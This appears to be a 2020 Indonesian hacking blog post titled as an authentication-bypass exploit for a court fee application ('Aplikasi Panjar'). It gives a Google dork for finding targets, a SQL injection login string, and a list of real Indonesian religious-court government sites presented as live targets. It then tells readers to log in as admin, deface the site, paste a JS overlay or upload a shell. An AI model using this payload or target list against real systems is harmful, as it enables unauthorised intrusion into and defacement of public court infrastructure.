Friday, February 14, 2020
# Exploit Title : Aplikasi Panjar Goverment Indonesia Authentication Bypass Vulnerability
# Exploit Author : Chu404
# Exploit Media Author : @chu_403
# Google Dork : intext:"Aplikasi Panjar Pengadilan Agama" inurl:/admin/
# Exploit User : ' or 1=1 limit 1 -- -+
# Exploit Author : Chu404
# Exploit Media Author : @chu_403
# Google Dork : intext:"Aplikasi Panjar Pengadilan Agama" inurl:/admin/
# Exploit User : ' or 1=1 limit 1 -- -+
Live Demo :
# http://panjar.pa-lamongan.go.id/
# http://panjar.pa-situbondo.go.id/
# http://panjar.pa-klaten.go.id/
# http://sapm.pa-lubuksikaping.go.id/
# http://panjar.pa-morotai.go.id/
# http://panjar.pa-makale.go.id/
# https://pa-tanjung.go.id/panjar
# http://biaya-perkara.pa-kendal.go.id/
# http://panjar.pa-trenggalek.go.id/
# http://panjar.pa-lamongan.go.id/
# http://panjar.pa-situbondo.go.id/
# http://panjar.pa-klaten.go.id/
# http://sapm.pa-lubuksikaping.go.id/
# http://panjar.pa-morotai.go.id/
# http://panjar.pa-makale.go.id/
# https://pa-tanjung.go.id/panjar
# http://biaya-perkara.pa-kendal.go.id/
# http://panjar.pa-trenggalek.go.id/
OK Langsung saja di praktekan
kalian dorking terlebih dahulu atau gunakan live demo yang tertera
saya anggap kalian sudah mendapatkan targetnya.. langsung saja cek admin login contoh : target.com/admin/ dan masukkan exploit user pada kolom username dan password
jika vuln maka kamu akan berhasil masuk dashboard adminnya
Selanjutnya pergi ke Pengaturan > Instalasi Pengguna. lihat gambar dibawah
Selanjutnya kalian bisa edit2 webnya, menempelkan JS Overlay, atau bisa juga upshell ( Tamper Data Only )
Greets To :
- XploitSec-ID - Palembang Cyber Team - PsychoXploit - D45H7 -
- XploitSec-ID - Palembang Cyber Team - PsychoXploit - D45H7 -
OK Semoga Tutorial kali ini bermanfaat !! Jangan lupa untuk share ke teman2 kalian